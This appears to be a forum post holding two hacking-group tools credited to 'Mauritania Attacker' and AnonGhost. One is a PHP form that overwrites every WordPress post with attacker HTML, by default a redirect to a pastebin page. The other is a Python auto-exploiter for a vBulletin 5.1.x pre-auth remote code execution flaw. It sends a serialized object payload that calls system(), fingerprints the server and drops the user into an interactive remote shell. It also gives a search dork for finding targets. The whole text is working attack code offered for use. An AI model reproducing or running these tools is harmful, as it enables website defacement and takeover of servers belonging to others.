<?php
echo '<form method="POST">
<p align="center">
<img border="0" src="https://i.imgur.com/a4J8oU3.jpg"></p>
<center><font color="red" size="6" face="impact">Wordpress Index Hijack Priv8</font></center>
<center><font color="red" size="2" face="orion">Coded By Mauritania Attacker</font></center>
<center><input type="text" value="localhost" name="pghost">
<input type="text" value="database_name" name="dbnmn">
<input type="text" value="prefix" name="prefix">
<input type="text" value="username_db" name="dbusrrrr">
<input type="text" value="password_db" name="pwddbbn"></center><br>
<center><textarea name="pown" cols="85" rows="10"><meta http-equiv="refresh" content="0;URL=http://pastebin.com/raw.php?i=WG1zASMG"></textarea><br>
<input type="submit" name="up2" value="Hijack Index"><br></center><form>';
$pghost = $_POST['pghost'];
$dbnmn = $_POST['dbnmn'];
$dbusrrrr = $_POST['dbusrrrr'];
$pwddbbn = $_POST['pwddbbn'];
$index = stripslashes($_POST['pown']);
$prefix = $_POST['prefix'];
//$prefix = "wp_";
if ($_POST['up2']) {
@mysql_connect($pghost, $dbusrrrr, $pwddbbn) or die(mysql_error());
@mysql_select_db($dbnmn) or die(mysql_error());
$tableName = $prefix . "posts";
$ghost1 = mysql_query("UPDATE $tableName SET post_title ='" . $index . "' WHERE ID > 0 ");
if (!$ghost1) {
$ghost2 = mysql_query("UPDATE $tableName SET post_content ='" . $index . "' WHERE ID > 0 ");
} elseif (!$ghost2) {
$ghost3 = mysql_query("UPDATE $tableName SET post_name ='" . $index . "' WHERE ID > 0 ");
}
mysql_close();
if ($ghost1 || $ghost2 || $ghost3) {
echo "<center><p><b><font color='red'>Index Website Have been Hijacked Successfully</font></p></b></center>";
} else {
echo "<center><p><b><font color='red'>Failed To Hijack the Website
</font></p></b></center>";
}
}
?>
#Exploit Title: vBulletin 5.1.x - PreAuth Remote Code Execution
#Date: 11-10-2015
#Dork:Powered by: vBulletin, Version 5.1 or make your own ^^
#Requirements: Python 3.4.x or higher, install Requests and parse Module.
#Description: Not the authors of this exploit we just fixed the exploit and coded this script (Mauritania Attacker & Th3Falcon)
import requests, re, sys
import parse as urlparse #BUG Python Module Parse Fixed By Mauritania Attacker (urllib.parse does not work properly)
def banner():
print( '\n' )
print( '++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++' )
print( ' VBulletin 5.1.x RCE auto Exploiter Priv8 ' )
print( ' GreetZ To All AnonGhost Members ' )
print( ' Coded by Mauritania Attacker & Th3Falcon ' )
print( '++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++' )
print( '\n' )
def inject( ghost ):
url = ghost + '/ajax/api/hook/decodeArguments?' #Added "?" after each decodeArguments variable By Mauritania Attacker
try:
r = requests.get( url, params = 'arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:14:"echo Th3Falcon";}', timeout= 50 )
if 'Th3Falcon' in r.text and len( r.text ) < 50:
try:
r = requests.get( url, params = 'arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:49:"whoami;echo :::;id;echo :::;uname -a;echo :::;pwd";}', timeout= 50 )
print( ' [+] GROUP : ' + r.text.split( ':::' )[0].strip() )
print( ' [+] USER : ' + r.text.split( ':::' )[1].strip() )
print( ' [+] KERNEL : ' + r.text.split( ':::' )[2].strip() )
print( ' [+] DIR : ' + r.text.split( ':::' )[3].strip() )
sys.stdout.flush()
return r.text.split( ':::' )[3].strip();
except:
return ''
else:
return ''
except:
print(' [+] Problem while exploiting..')
return ''
def bash(ghost, command):
url = ghost + '/ajax/api/hook/decodeArguments?' #Added "?" after each decodeArguments variable By Mauritania Attacker
r = requests.get( url, params = 'arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:' + str(len(command)) + ':"' + command + '";}', timeout= 50 )
print(r.text)
def main():
banner()
site = ''
while site != 'exit':
site = input('Target : ')
if site == 'exit':
break
mad = inject(site)
if mad != '' :
print(' [+] @Connection Successfully established... \n')
userinput = ''
while userinput != 'exit':
userinput = input("AnonGhost@Target :")
if userinput == 'exit':
break
bash(site, userinput)
else:
print(' [+] Website is not Vulnerable
')
if __name__ == '__main__':
main()
#D0ne
#./Mauritania Attacker
#./Th3Falcon
#GreetZ To All AnonGhost MemberZ
Post a new topic in უსათაურო
